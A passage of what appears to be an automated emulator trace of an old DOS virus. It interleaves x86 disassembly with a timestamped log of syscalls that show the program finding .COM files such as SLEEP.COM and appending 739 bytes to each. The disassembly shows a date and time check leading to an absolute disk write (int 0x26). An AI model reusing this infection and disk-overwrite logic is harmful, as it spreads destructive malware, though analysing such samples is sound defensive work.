0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:17.779190244Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:17.784350903Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:19.071561732Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:19.073094524Z 78 PC: 12afb | Find first file
2018-12-25T12:55:19.078816461Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:19.085000885Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:19.091802276Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:19.093598447Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:19.096187881Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:19.111052676Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:19.112777195Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:19.117348071Z 62 PC: 12aef | Close file
2018-12-25T12:55:19.124937492Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.136485159Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.140554215Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.144804509Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.146522455Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.148337893Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.153453628Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.155338021Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.16218059Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.170632478Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.174227411Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.180481834Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.186575018Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.18845492Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.191285809Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.199432162Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.201302776Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.207858025Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.2160806Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.220222744Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.226930802Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.233325995Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.235728223Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.238286778Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.245947648Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.247505901Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.254063649Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.261930699Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.265676536Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.272645999Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.278904583Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.280194414Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.282892761Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.290577428Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.291772655Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.298310737Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.306009186Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.308245965Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.315311488Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.321368047Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.322612585Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.325688872Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.334518408Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.335765869Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.343490525Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.351385121Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.35372674Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.360378287Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.366385221Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:19.367452179Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:19.370302224Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:19.378044486Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:19.379395626Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:19.386919816Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.395594543Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.398451295Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:19.405663133Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:19.408172272Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:19.409853904Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:19.413373248Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:19.415825548Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:19.418207703Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:19.421084906Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:19.425933666Z 26 PC: 12ab9 | Set disk transfer address